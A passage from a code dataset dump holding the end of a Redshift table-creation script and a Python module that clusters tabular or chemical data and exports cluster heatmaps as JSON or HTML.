\n \"\"\"\n for query in create_table_queries:\n try:\n cur.execute(query)\n except psycopg2.Error as e: \n print(\"Error: Issue creating table\")\n print (e)\n \n try:\n conn.commit()\n except psycopg2.Error as e:\n print(\"Error: Issue commiting to DB\")\n print (e)\n\n\ndef main():\n \"\"\"\n Description:\n - Parse and read our Redshift DB configs in dwh.cfg file \n - Open connection to sparkifydb\n - Create cursor\n - Drop all tables\n - Create all tables\n - Close connection to DB\n \n Arguments:\n - drop_tables(cur): cursor object\n - drop_tables(conn): connection to db\n - create_tables(cur): cursor object\n - process_date(conn): connection to db\n \n Returns:\n - None\n \n \"\"\"\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aletje/Cloud-Computing-AWS-Redshift","sub_path":"create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15527265817","text":"#coding: utf-8\nfrom __future__ import print_function\n\nimport csv, json, copy, re, argparse, os, requests\n\nimport numpy, scipy, fastcluster, sklearn, jsmin\nimport scipy.cluster.hierarchy as hcluster\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom scipy import spatial\n\nimport randomcolor\n\ntry:\n import rdkit\n from rdkit import Chem\n from rdkit.Chem import AllChem\n RDKIT = True\n\n FP2FNC = {\n \"ecfp4\": lambda rdmol: AllChem.GetMorganFingerprintAsBitVect(rdmol, radius=2, nBits=1024),\n \"ecfp6\": lambda rdmol: AllChem.GetMorganFingerprintAsBitVect(rdmol, radius=3, nBits=1024),\n \"apfp\": lambda rdmol: AllChem.GetHashedAtomPairFingerprintAsBitVect(rdmol, nBits=1024),\n \"ttfp\": lambda rdmol: AllChem.GetHashedTopologicalTorsionFingerprintAsBitVect(rdmol, nBits=1024),\n \"maccs\": lambda rdmol: AllChem.GetMACCSKeysFingerprint(rdmol),\n }\n \nexcept Exception as e:\n RDKIT = False\n print(\"RDKit not found: Cheminformatic-based functionality not available...\")\n\nLINKAGES = [\"single\", \"complete\", \"average\", \"centroid\", \"ward\", \"median\", \"weighted\"]\nRAW_LINKAGES = [\"ward\", \"centroid\"]\nDISTANCES = {\"numeric\": [\"braycurtis\", \"canberra\", \"chebyshev\", \"cityblock\", \"correlation\", \"cosine\", \"euclidean\", \"mahalanobis\", \"minkowski\", \"seuclidean\", \"sqeuclidean\"],\n \"binary\": [\"dice\",\"hamming\",\"jaccard\",\"kulsinski\",\"matching\",\"rogerstanimoto\",\"russellrao\",\"sokalmichener\",\"sokalsneath\",\"yule\"]}\n\nclass Dendrogram():\n \"\"\"Class which handles the generation of cluster heatmap format of clustered data. 
\n As an input it takes a Cluster instance with clustered data.\"\"\"\n\n def __init__(self, clustering):\n self.cluster_object = clustering\n self.datatype = clustering.datatype\n self.axis = clustering.clustering_axis\n self.clustering = clustering.clustering\n self.tree = hcluster.to_tree(self.clustering)\n self.data = clustering.data\n self.data_names = clustering.data_names\n self.labels = clustering.labels\n self.header = clustering.header\n self.dendrogram = False\n self.smiles = clustering.smiles\n self.add_structures = clustering.add_structures\n\n def __get_cluster_heatmap__(self, write_data):\n root, nodes = hcluster.to_tree(self.clustering, rd=True)\n node_id2node = {}\n dendrogram = {\"nodes\":{}}\n\n for node in nodes:\n node_id = node.id\n if node.count == 1:\n node_id2node[node_id] = {\"count\":1, \"distance\":0}\n\n else:\n node_left_child = node.get_left().id\n node_right_child = node.get_right().id\n node_id2node[node_id] = {\"count\":node.count, \"distance\":round(node.dist, 3), \"left_child\": node_left_child, \"right_child\": node_right_child}\n\n for n, node in node_id2node.items():\n if node[\"count\"] != 1:\n node_id2node[node[\"left_child\"]][\"parent\"] = n\n node_id2node[node[\"right_child\"]][\"parent\"] = n\n\n for n, node in node_id2node.items():\n\n if node[\"count\"] == 1:\n data = self.data[n]\n node[\"objects\"] = [self.data_names[n]]\n if self.labels:\n node[\"label\"] = self.labels[n]\n\n if self.add_structures:\n node[\"structure\"] = self.smiles[n]\n\n if node_id2node[node[\"parent\"]][\"left_child\"] == n:\n node_id2node[node[\"parent\"]][\"left_child\"] = n\n else:\n node_id2node[node[\"parent\"]][\"right_child\"] = n\n\n if not write_data:\n data = []\n\n node[\"features\"] = data\n dendrogram[\"nodes\"][n] = node\n\n for n in node_id2node:\n if node_id2node[n][\"count\"] != 1:\n dendrogram[\"nodes\"][n] = node_id2node[n]\n\n return dendrogram\n\n def __get_column_dendrogram__(self):\n root, nodes = hcluster.to_tree(self.cluster_object.column_clustering, rd=True)\n node_id2node = {}\n dendrogram = {\"nodes\":{}}\n\n for node in nodes:\n node_id = node.id\n if node.count == 1:\n node_id2node[node_id] = {\"count\":1, \"distance\":0}\n\n else:\n node_left_child = node.get_left().id\n node_right_child = node.get_right().id\n node_id2node[node_id] = {\"count\":node.count, \"distance\":round(node.dist, 3), \"left_child\": node_left_child, \"right_child\": node_right_child}\n\n for n in node_id2node:\n node = node_id2node[n]\n if node[\"count\"] != 1:\n node_id2node[node[\"left_child\"]][\"parent\"] = n\n node_id2node[node[\"right_child\"]][\"parent\"] = n\n\n for n in node_id2node:\n if not n in dendrogram[\"nodes\"]:\n dendrogram[\"nodes\"][n] = node_id2node[n]\n\n return dendrogram\n\n def __get_leaves_for_node__(self, nodeid):\n nodes = [nodeid]\n leaves = []\n\n while len(nodes):\n for nodeid in nodes:\n node = self.dendrogram[\"data\"][\"nodes\"][nodeid]\n if node[\"count\"] > 1:\n nodes.extend([node[\"left_child\"], node[\"right_child\"]])\n\n else:\n leaves.append(nodeid)\n\n nodes.remove(nodeid)\n\n return leaves\n\n\n def create_cluster_heatmap(self, compress=False, compressed_value=\"median\", write_data=True):\n \"\"\"Creates cluster heatmap representation in inchlib format. By setting compress parameter to True you can\n cut the dendrogram in a distance to decrease the row size of the heatmap to specified count. 
\n When compressing the type of the resulted value of merged rows is given by the compressed_value parameter (median, mean).\n When the metadata are nominal (text values) the most frequent is the result after compression.\n By setting write_data to False the data features won't be present in the resulting format.\"\"\"\n self.dendrogram = {\"data\": self.__get_cluster_heatmap__(write_data)}\n\n self.compress = compress\n self.compressed_value = compressed_value\n self.compress_cluster_threshold = 0\n if self.compress and self.compress >= 0:\n self.compress_cluster_threshold = self.__get_distance_threshold__(compress)\n print(\"Distance threshold for compression:\", self.compress_cluster_threshold)\n if self.compress_cluster_threshold >= 0:\n self.__compress_data__()\n else:\n self.compress = False\n\n if self.header and write_data:\n self.dendrogram[\"data\"][\"feature_names\"] = [h for h in self.header]\n elif self.header and not write_data:\n self.dendrogram[\"data\"][\"feature_names\"] = []\n \n if self.axis == \"both\" and len(self.cluster_object.column_clustering):\n column_dendrogram = hcluster.to_tree(self.cluster_object.column_clustering) \n self.dendrogram[\"column_dendrogram\"] = self.__get_column_dendrogram__()\n\n def color_clusters(self, cluster_count):\n \"\"\"Color given number of clusters based on a dendrogram cut\n \n Arguments:\n cluster_count {[int]} -- numer of clusters\n \"\"\"\n if cluster_count > 1:\n self.cluster_distance_threshold = self.__get_distance_threshold__(cluster_count)\n rand_color = randomcolor.RandomColor()\n \n to_color = []\n for nodeid, node in self.dendrogram[\"data\"][\"nodes\"].items():\n if node[\"distance\"] < self.cluster_distance_threshold and self.dendrogram[\"data\"][\"nodes\"].get(node[\"parent\"], {\"distance\": 0})[\"distance\"] > self.cluster_distance_threshold:\n to_color.append(nodeid)\n\n colors = rand_color.generate(count=len(to_color))\n for i, nodeid in enumerate(to_color):\n node_leaves = self.__get_leaves_for_node__(nodeid)\n self.dendrogram[\"data\"][\"nodes\"][nodeid][\"color\"] = colors[i]\n\n for lid in node_leaves:\n self.dendrogram[\"data\"][\"nodes\"][lid][\"cluster\"] = i\n\n def __compress_data__(self):\n nodes = {}\n to_remove = set()\n\n compressed_value2fnc = {\n \"median\": lambda values: [round(numpy.median([v for v in value if v is not None]), 3) if len([v for v in value if v is not None]) else None for value in values],\n \"mean\": lambda values: [round(numpy.average([v for v in value if v is not None]), 3) if len([v for v in value if v is not None]) else None for value in values],\n }\n \n for n in self.dendrogram[\"data\"][\"nodes\"]:\n node = self.dendrogram[\"data\"][\"nodes\"][n]\n\n if node[\"count\"] == 1:\n objects = node[\"objects\"]\n data = node[\"features\"]\n node_id = n\n\n while self.dendrogram[\"data\"][\"nodes\"][node[\"parent\"]][\"distance\"] <= self.compress_cluster_threshold:\n to_remove.add(node_id)\n node_id = node[\"parent\"]\n node = self.dendrogram[\"data\"][\"nodes\"][node_id]\n\n if node[\"count\"] != 1:\n\n if not \"objects\" in self.dendrogram[\"data\"][\"nodes\"][node_id]:\n self.dendrogram[\"data\"][\"nodes\"][node_id][\"objects\"] = []\n self.dendrogram[\"data\"][\"nodes\"][node_id][\"features\"] = []\n \n self.dendrogram[\"data\"][\"nodes\"][node_id][\"objects\"].extend(objects)\n\n if data:\n self.dendrogram[\"data\"][\"nodes\"][node_id][\"features\"].append(data)\n\n for node in to_remove:\n self.dendrogram[\"data\"][\"nodes\"].pop(node)\n\n for k in 
self.dendrogram[\"data\"][\"nodes\"]:\n node = self.dendrogram[\"data\"][\"nodes\"][k]\n if \"objects\" in node and node[\"count\"] != 1:\n self.dendrogram[\"data\"][\"nodes\"][k][\"distance\"] = 0\n self.dendrogram[\"data\"][\"nodes\"][k][\"count\"] = 1\n self.dendrogram[\"data\"][\"nodes\"][k].pop(\"left_child\")\n self.dendrogram[\"data\"][\"nodes\"][k].pop(\"right_child\")\n rows = zip(*self.dendrogram[\"data\"][\"nodes\"][k][\"features\"])\n self.dendrogram[\"data\"][\"nodes\"][k][\"features\"] = compressed_value2fnc[self.compressed_value](rows)\n\n self.__adjust_node_counts__()\n\n def __adjust_node_counts__(self):\n leaves = []\n\n for n in self.dendrogram[\"data\"][\"nodes\"]:\n if self.dendrogram[\"data\"][\"nodes\"][n][\"count\"] > 1:\n self.dendrogram[\"data\"][\"nodes\"][n][\"count\"] = 0\n else:\n leaves.append(n)\n\n for n in leaves:\n node = self.dendrogram[\"data\"][\"nodes\"][n]\n parent_id = node[\"parent\"]\n\n while parent_id:\n node = self.dendrogram[\"data\"][\"nodes\"][parent_id]\n self.dendrogram[\"data\"][\"nodes\"][parent_id][\"count\"] += 1\n parent_id = False\n if \"parent\" in node:\n parent_id = node[\"parent\"]\n\n def __get_distance_threshold__(self, cluster_count):\n print(\"Calculating distance threshold...\")\n if cluster_count >= self.tree.count:\n return -1\n \n i = 0\n count = cluster_count + 1\n test_step = self.tree.dist/2\n\n while test_step >= 0.1:\n count = len(set([c for c in hcluster.fcluster(self.clustering, i, \"distance\")]))\n if count < cluster_count:\n if i == 0:\n return 0\n i = i - test_step\n test_step = test_step/2\n elif count == cluster_count:\n return i\n else:\n i += test_step\n\n return i+test_step*2\n\n def export_cluster_heatmap_as_json(self, filename=None, minify=False, dump=True):\n \"\"\"Returns cluster heatmap in a JSON format or exports it to the file specified by the filename parameter.\"\"\"\n dendrogram = self.dendrogram\n if minify:\n dendrogram_json = json.dumps(dendrogram)\n dendrogram_json = self.__minify_data(dendrogram_json)\n elif dump:\n dendrogram_json = json.dumps(dendrogram, indent=4)\n else:\n dendrogram_json = dendrogram\n \n if filename:\n output = open(filename, \"w\")\n output.write(dendrogram_json)\n return dendrogram_json\n\n def __minify_data(self, data):\n return jsmin.jsmin(str(data))\n\n def export_cluster_heatmap_as_html(self, htmldir=\".\"):\n \"\"\"Export simple HTML page with embedded cluster heatmap and dependencies to given directory.\"\"\"\n if not os.path.exists(htmldir):\n os.makedirs(htmldir)\n dendrogram_json = json.dumps(self.dendrogram, indent=4)\n template = \"\"\"\n \n \n \n \n \n \n\n \n
\n \n \"\"\".format(dendrogram_json)\n\n lib2url = {\n \"inchlib-1.1.0.js\": \"https://openscreen.cz/software/inchlib/static/js/inchlib-1.1.0.js\",\n \"jquery-2.0.3.min.js\": \"https://openscreen.cz/software/inchlib/static/js/jquery-2.0.3.min.js\",\n \"kinetic-v5.1.0.min.js\": \"https://openscreen.cz/software/inchlib/static/js/kinetic-v5.1.0.min.js\"\n }\n \n for lib, url in lib2url.items():\n try:\n source = requests.get(url)\n source_html = source.content\n\n with open(os.path.join(htmldir, lib), \"w\") as output:\n output.write(source_html)\n \n except Exception as e:\n raise Exception(\"\\nCan't download file {}.\\nPlease check your internet connection and try again.\\nIf the error persists there can be something wrong with the InCHlib server.\\n\".format(url))\n\n with open(os.path.join(htmldir, \"inchlib.html\"), \"w\") as output:\n output.write(template)\n\n def add_metadata_from_file(self, metadata_file, delimiter, header=True, metadata_compressed_value=\"median\"):\n \"\"\"Adds metadata from csv file.\n Metadata_compressed_value specifies the resulted value when the data are compressed (median/mean/frequency)\"\"\"\n self.metadata_compressed_value = metadata_compressed_value\n self.metadata, self.metadata_header = self.__read_metadata_file__(metadata_file, delimiter, header)\n self.__connect_metadata_to_data__()\n\n def add_metadata(self, metadata, header=True, metadata_compressed_value=\"median\"):\n \"\"\"Adds metadata in a form of list of lists (tuples).\n Metadata_compressed_value specifies the resulted value when the data are compressed (median/mean/frequency)\"\"\"\n self.metadata_compressed_value = metadata_compressed_value\n self.metadata, self.metadata_header = self.__read_metadata__(metadata, header)\n self.__connect_metadata_to_data__()\n\n def __connect_metadata_to_data__(self):\n print(\"Adding metadata: {} rows\".format(len(self.metadata)))\n self.dendrogram[\"metadata\"] = {}\n\n if self.metadata_header:\n self.dendrogram[\"metadata\"][\"feature_names\"] = self.metadata_header\n\n self.dendrogram[\"metadata\"][\"nodes\"] = self.__connect_additional_data_to_data__(self.metadata, self.metadata_compressed_value)\n\n def __read_metadata__(self, metadata, header):\n metadata_header = []\n rows = metadata\n metadata = {}\n data_start = 0\n\n if header:\n metadata_header = rows[0][1:]\n data_start = 1\n \n for row in rows[data_start:]:\n metadata[str(row[0])] = [r for r in row[1:]]\n\n return metadata, metadata_header\n\n \n def __read_metadata_file__(self, metadata_file, delimiter, header):\n csv_reader = csv.reader(open(metadata_file, \"r\"), delimiter=delimiter)\n metadata_header = []\n rows = [row for row in csv_reader]\n metadata = {}\n data_start = 0\n\n if header:\n metadata_header = rows[0][1:]\n data_start = 1\n \n for row in rows[data_start:]:\n metadata_id = str(row[0])\n metadata[metadata_id] = [r for r in row[1:]]\n\n return metadata, metadata_header\n\n def add_column_metadata(self, column_metadata, header=True):\n \"\"\"Adds column metadata in a form of list of lists (tuples). 
\n Column metadata doesn't have header row, first item in each row is used as label instead\"\"\"\n if header:\n self.column_metadata = [r[1:] for r in column_metadata]\n self.column_metadata_header = [r[0] for r in column_metadata]\n else:\n self.column_metadata = [r for r in column_metadata]\n self.column_metadata_header = False\n\n self.__check_column_metadata_length__()\n self.__add_column_metadata_to_data__()\n\n def add_column_metadata_from_file(self, column_metadata_file, delimiter=\",\", header=True):\n \"\"\"Adds column metadata from csv file. Column metadata doesn't have header.\"\"\"\n csv_reader = csv.reader(open(column_metadata_file, \"r\"), delimiter=delimiter)\n column_metadata = [row for row in csv_reader]\n self.add_column_metadata(column_metadata, header)\n\n def __check_column_metadata_length__(self):\n features_length = len(self.data[0])\n for row in self.column_metadata:\n if features_length != len(row):\n raise Exception(\"Column metadata length and features length must be the same.\")\n\n def __add_column_metadata_to_data__(self):\n if self.cluster_object.clustering_axis == \"both\":\n self.column_data = self.cluster_object.__reorder_data__(self.column_metadata, self.cluster_object.data_order)\n self.dendrogram[\"column_metadata\"] = {\"features\":self.column_metadata}\n if self.column_metadata_header:\n self.dendrogram[\"column_metadata\"][\"feature_names\"] = self.column_metadata_header\n\n def add_alternative_data_from_file(self, alternative_data_file, delimiter, header, alternative_data_compressed_value):\n \"\"\"Adds alternative_data from csv file.\"\"\"\n self.alternative_data_compressed_value = alternative_data_compressed_value\n self.add_alternative_data(self.__read_alternative_data_file__(alternative_data_file, delimiter), header, alternative_data_compressed_value)\n\n def add_alternative_data(self, alternative_data, header, alternative_data_compressed_value):\n \"\"\"Adds alternative data in a form of list of lists (tuples).\"\"\"\n self.alternative_data_compressed_value = alternative_data_compressed_value\n\n if self.cluster_object.clustering_axis == \"both\":\n alternative_data = self.__reorder_alternative_data__(alternative_data)\n\n self.dendrogram[\"alternative_data\"] = {}\n self.alternative_data_header = False\n \n if header:\n self.alternative_data_header = alternative_data[0][1:]\n self.dendrogram[\"alternative_data\"][\"feature_names\"] = self.alternative_data_header\n alternative_data = alternative_data[1:]\n\n self.alternative_data = self.__read_alternative_data__(alternative_data)\n\n print(\"Adding alternative data: {} rows\".format(len(self.alternative_data)))\n self.dendrogram[\"alternative_data\"][\"nodes\"] = self.__connect_additional_data_to_data__(self.alternative_data, self.alternative_data_compressed_value)\n\n def __reorder_alternative_data__(self, alternative_data):\n alt_data_without_id = [r[1:] for r in alternative_data]\n reordered_data = self.cluster_object.__reorder_data__(alt_data_without_id, self.cluster_object.data_order)\n rows = []\n for i, r in enumerate(alternative_data):\n row = [r[0]]\n row.extend(reordered_data[i])\n rows.append(row)\n return rows\n\n def __read_alternative_data_file__(self, alternative_data_file, delimiter):\n csv_reader = csv.reader(open(alternative_data_file, \"r\"), delimiter=delimiter)\n return [r for r in csv_reader]\n\n def __read_alternative_data__(self, alternative_data):\n return {str(r[0]):r[1:] for r in alternative_data}\n\n def __connect_additional_data_to_data__(self, additional_data, 
compressed_value):\n if len(set(additional_data.keys()) & set(self.data_names)) == 0:\n print(\"No data objects correspond with the clustered data according to their IDs. No additional data added.\")\n return\n\n if not self.dendrogram:\n raise Exception(\"You must create dendrogram before adding data to it.\")\n\n node2additional_data = {}\n\n leaves = {n:node for n, node in self.dendrogram[\"data\"][\"nodes\"].items() if node[\"count\"] == 1}\n\n if not self.compress:\n for leaf_id, leaf in leaves.items():\n try:\n node2additional_data[leaf_id] = additional_data[leaf[\"objects\"][0]]\n except Exception as e:\n continue\n else:\n compressed_value2fnc = {\n \"median\": lambda values: round(numpy.median(col), 3),\n \"mean\": lambda values: round(numpy.average(col), 3),\n \"frequency\": lambda values: self.__get_most_frequent__(col)\n }\n\n for leaf in leaves:\n objects = []\n for item in leaves[leaf][\"objects\"]:\n try:\n objects.append(additional_data[item])\n except Exception as e:\n continue\n\n cols = zip(*objects)\n row = []\n cols = [list(c) for c in cols]\n\n for col in cols:\n if compressed_value in compressed_value2fnc:\n try:\n col = [float(c) for c in col]\n value = compressed_value2fnc[compressed_value](col)\n except ValueError:\n value = compressed_value2fnc[\"frequency\"](col)\n \n else:\n raise Exception(\"Unkown type of metadata_compressed_value: {}. Possible values are: median, mean, frequency.\".format(self.metadata_compressed_value))\n \n row.append(value)\n\n node2additional_data[leaf] = row\n\n return node2additional_data\n\n def __get_most_frequent__(self, col):\n freq2val = {col.count(v):v for v in set(col)}\n value = freq2val[max(freq2val.keys())]\n return value\n\nclass Cluster():\n \"\"\"Class for data clustering\"\"\"\n\n def __init__(self):\n self.write_original = False\n\n def read_csv(self, filename, delimiter=\",\", header=False, missing_values=False, datatype=\"numeric\", compound_structure_field=False, add_structures=False, label_field=False):\n \"\"\"Reads data from the CSV file\"\"\"\n self.filename = filename\n csv_reader = csv.reader(open(self.filename, \"r\"), delimiter=delimiter)\n rows = [row for row in csv_reader]\n self.read_data(rows, header, missing_values, datatype, compound_structure_field, add_structures, label_field)\n\n def read_data(self, rows, header=False, missing_values=False, datatype=\"numeric\", compound_structure_field=False, add_structures=False, label_field=False):\n \"\"\"Reads data in a form of list of lists (tuples)\"\"\"\n self.datatype = datatype\n self.missing_values = missing_values\n self.header = header\n self.compound_structure_field = compound_structure_field\n self.label_field = label_field\n self.labels = False\n self.smiles = False\n self.rdmols = False\n self.fpobjs = False\n self.add_structures = add_structures\n\n data_start = 0\n\n if self.header and self.compound_structure_field and self.compound_structure_field in rows[0]:\n print(\"Reading compound structures...\")\n csf_index = rows[0].index(self.compound_structure_field)\n self.smiles = [row[csf_index] for row in rows[1:]]\n \n for row in rows:\n row.pop(csf_index)\n\n if self.header and self.label_field:\n label_index = rows[0].index(self.label_field)\n self.labels = [row[label_index] for i, row in enumerate(rows[1:])]\n \n for row in rows:\n row.pop(label_index)\n\n if self.header:\n self.header = rows[0][1:]\n data_start = 1\n \n self.data_names = [str(row[0]) for row in rows[data_start:]]\n self.data = numpy.array([row[1:] for row in rows[data_start:]])\n 
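# --- Illustrative sketch (editor's addition, not part of the original record). ---
# The row clustering performed by this module reduces to a pdist -> linkage ->
# to_tree pipeline from SciPy. A minimal standalone version on made-up sample
# data, using the same `hcluster` alias as the imports above:
import numpy as np
from scipy.spatial.distance import pdist
import scipy.cluster.hierarchy as hcluster

def cluster_rows(data, metric="euclidean", method="average"):
    """Return (linkage_matrix, root_node) for a 2-D array of row features."""
    condensed = pdist(np.asarray(data, dtype=float), metric=metric)
    linkage_matrix = hcluster.linkage(condensed, method=method)
    return linkage_matrix, hcluster.to_tree(linkage_matrix)

linkage_matrix, root = cluster_rows([[0.0, 1.0], [0.1, 0.9], [5.0, 5.0]])
print(root.count)  # 3 leaves under the root node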
self.original_data = copy.deepcopy(self.data)\n\n if not self.missing_values is False:\n self.data, self.missing_values_indexes = self.__impute_missing_values__(self.data)\n self.original_data = self.__return_missing_values__(copy.deepcopy(self.data), self.missing_values_indexes)\n\n self.original_data = [[float(val) if not val is None else None for val in r] for r in self.original_data]\n self.data = [[float(val) if not val is None else None for val in r] for r in self.data]\n \n def __impute_missing_values__(self, data):\n datatype2impute = {\"numeric\": {\"strategy\":\"mean\", \n \"value\": lambda value: round(float(value), 3)}, \n \"binary\": {\"strategy\":\"most_frequent\", \n \"value\": lambda value: int(value)}\n }\n\n if not self.datatype in DISTANCES:\n raise Exception(\"\".join([\"You can choose only from data types: \", \", \".join(DISTANCES.keys())]))\n\n missing_values_indexes = []\n print(self.data)\n for i, row in enumerate(self.data):\n missing_values_indexes.append([j for j, v in enumerate(row) if v in self.missing_values])\n\n for j, value in enumerate(row):\n if value in self.missing_values:\n data[i][j] = numpy.nan\n\n imputer = SimpleImputer(missing_values=numpy.nan, strategy=datatype2impute[self.datatype][\"strategy\"], keep_empty_features=True)\n imputed_data = [list(row) for row in imputer.fit_transform(self.data)]\n imputed_data = [[datatype2impute[self.datatype][\"value\"](value) for value in row] for row in imputed_data]\n return imputed_data, missing_values_indexes\n \n def normalize_data(self, feature_range=(0,1), write_original=False):\n \"\"\"Normalizes data to a scale from 0 to 1. When write_original is set to True, \n the normalized data will be clustered, but original data will be written to the heatmap.\"\"\"\n self.write_original = write_original\n min_max_scaler = MinMaxScaler(feature_range)\n self.data = min_max_scaler.fit_transform(self.data)\n self.data = [[round(v, 3) for v in row] for row in self.data]\n\n def cluster_data(self, row_distance=\"euclidean\", row_linkage=\"single\", axis=\"row\", column_distance=\"euclidean\", column_linkage=\"ward\", cluster_by_structures=False):\n \"\"\"Performs clustering according to the given parameters.\n @datatype - numeric/binary\n @row_distance/column_distance - see. DISTANCES variable\n @row_linkage/column_linkage - see. 
LINKAGES variable\n @axis - row/both\n \"\"\"\n self.clustered_by_structures = False\n\n if cluster_by_structures and RDKIT and self.compound_structure_field:\n print(\"Generating structure fingerprints...\")\n self.rdmols = [Chem.MolFromSmiles(smiles) for smiles in self.smiles]\n self.fpobjs = [FP2FNC[\"ecfp4\"](rdmol).ToList() for rdmol in self.rdmols]\n self.datatype = \"binary\"\n self.data = self.fpobjs\n \n if not row_distance in DISTANCES[self.datatype]:\n print(\"Distance set to jaccard...\")\n row_distance = \"jaccard\"\n\n self.clustered_by_structures = True\n\n print(\"Clustering rows:\", row_distance, row_linkage)\n self.clustering_axis = axis\n row_linkage = str(row_linkage)\n \n if row_linkage in RAW_LINKAGES:\n self.clustering = fastcluster.linkage(self.data, method=row_linkage, metric=row_distance)\n\n else:\n self.distance_vector = fastcluster.pdist(self.data, row_distance)\n\n if self.datatype == \"numeric\" and not row_distance in DISTANCES[self.datatype]:\n raise Exception(\"\".join([\"When clustering numeric data you must choose from these distance measures: \", \", \".join(DISTANCES[self.datatype])]))\n elif (self.datatype == \"binary\" or self.datatype == \"nominal\") and not row_distance in DISTANCES[self.datatype]:\n raise Exception(\"\".join([\"When clustering binary or nominal data you must choose from these distance measures: \", \", \".join(DISTANCES[self.datatype])]))\n\n self.clustering = fastcluster.linkage(self.distance_vector, method=str(row_linkage))\n\n\n if not self.missing_values is False:\n self.data = self.__return_missing_values__(self.data, self.missing_values_indexes)\n \n self.column_clustering = []\n\n if axis == \"both\" and len(self.data[0]) > 2:\n print(\"Clustering columns:\", column_distance, column_linkage)\n self.__cluster_columns__(column_distance, column_linkage)\n \n if self.write_original or self.datatype == \"nominal\" or self.clustered_by_structures:\n self.data = self.original_data\n\n def __return_missing_values__(self, data, missing_values_indexes):\n for i, indexes in enumerate(missing_values_indexes):\n if indexes:\n for index in indexes:\n data[i][index] = None\n return data\n\n def __cluster_columns__(self, column_distance, column_linkage):\n self.data = [list(col) for col in zip(*self.data)]\n if not self.missing_values is False:\n self.data, missing_values_indexes = self.__impute_missing_values__(self.data)\n \n self.column_clustering = fastcluster.linkage(self.data, method=column_linkage, metric=column_distance)\n self.data_order = hcluster.leaves_list(self.column_clustering)\n\n if not self.missing_values is False:\n self.data = self.__return_missing_values__(self.data, missing_values_indexes)\n \n self.data = list(zip(*self.data))\n self.data = self.__reorder_data__(self.data, self.data_order)\n self.original_data = self.__reorder_data__(self.original_data, self.data_order)\n if self.header:\n self.header = self.__reorder_data__([self.header], self.data_order)[0]\n\n def __reorder_data__(self, data, order):\n for i in range(len(data)):\n reordered_data = []\n for j in order:\n reordered_data.append(data[i][j])\n reordered_data.reverse()\n data[i] = reordered_data\n\n return data\n\ndef _process_(arguments):\n c = Cluster()\n c.read_csv(\n filename=arguments.data_file, \n delimiter=arguments.data_delimiter, \n header=arguments.data_header, \n missing_values=arguments.missing_values, \n datatype=arguments.datatype,\n compound_structure_field=arguments.compound_structure_field,\n add_structures=arguments.add_structures,\n 
label_field=arguments.label_field\n )\n \n if arguments.normalize:\n c.normalize_data(feature_range=(0,1), write_original=arguments.write_original)\n\n c.cluster_data(row_distance=arguments.row_distance,\n row_linkage=arguments.row_linkage,\n axis=arguments.axis,\n column_distance=arguments.column_distance,\n column_linkage=arguments.column_linkage,\n cluster_by_structures=arguments.cluster_by_structures\n )\n\n d = Dendrogram(c)\n d.create_cluster_heatmap(compress=arguments.compress, compressed_value=arguments.compressed_value, write_data=not arguments.dont_write_data)\n\n if arguments.color_clusters > 1:\n d.color_clusters(cluster_count=arguments.color_clusters)\n \n if arguments.metadata:\n d.add_metadata_from_file(metadata_file=arguments.metadata, delimiter=arguments.metadata_delimiter, header=arguments.metadata_header, metadata_compressed_value=arguments.metadata_compressed_value)\n \n if arguments.column_metadata:\n d.add_column_metadata_from_file(column_metadata_file=arguments.column_metadata, delimiter=arguments.column_metadata_delimiter, header=arguments.column_metadata_header)\n\n if arguments.alternative_data:\n d.add_alternative_data_from_file(alternative_data_file=arguments.alternative_data, delimiter=arguments.alternative_data_delimiter, header=arguments.alternative_data_header, alternative_data_compressed_value=arguments.alternative_data_compressed_value)\n \n if arguments.output_file or arguments.html_dir:\n if arguments.output_file:\n d.export_cluster_heatmap_as_json(arguments.output_file, minify=arguments.minify, dump=arguments.json_dump)\n else:\n d.export_cluster_heatmap_as_html(arguments.html_dir)\n else:\n print(d.export_cluster_heatmap_as_json(filename=None, minify=arguments.minify, dump=arguments.json_dump))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\"data_file\", type=str, help=\"csv(text) data file with delimited values\")\n parser.add_argument(\"-o\", \"--output_file\", type=str, help=\"the name of output file\")\n parser.add_argument(\"-html\", \"--html_dir\", type=str, help=\"the directory to store HTML page with dependencies\")\n parser.add_argument(\"-rd\", \"--row_distance\", type=str, default=\"euclidean\", help=\"set the distance to use for clustering rows\")\n parser.add_argument(\"-rl\", \"--row_linkage\", type=str, default=\"ward\", help=\"set the linkage to use for clustering rows\")\n parser.add_argument(\"-cd\", \"--column_distance\", type=str, default=\"euclidean\", help=\"set the distance to use for clustering columns (only when clustering by both axis -a parameter)\")\n parser.add_argument(\"-cl\", \"--column_linkage\", type=str, default=\"ward\", help=\"set the linkage to use for clustering columns (only when clustering by both axis -a parameter)\")\n parser.add_argument(\"-a\", \"--axis\", type=str, default=\"row\", help=\"define clustering axis (row/both)\")\n parser.add_argument(\"-dt\", \"--datatype\", type=str, default=\"numeric\", help=\"specify the type of the data (numeric/binary)\")\n parser.add_argument(\"-dd\", \"--data_delimiter\", type=str, default=\",\", help=\"delimiter of values in data file\")\n parser.add_argument(\"-m\", \"--metadata\", type=str, default=None, help=\"csv(text) metadata file with delimited values\")\n parser.add_argument(\"-md\", \"--metadata_delimiter\", type=str, default=\",\", help=\"delimiter of values in metadata file\")\n parser.add_argument(\"-dh\", \"--data_header\", default=False, help=\"whether the 
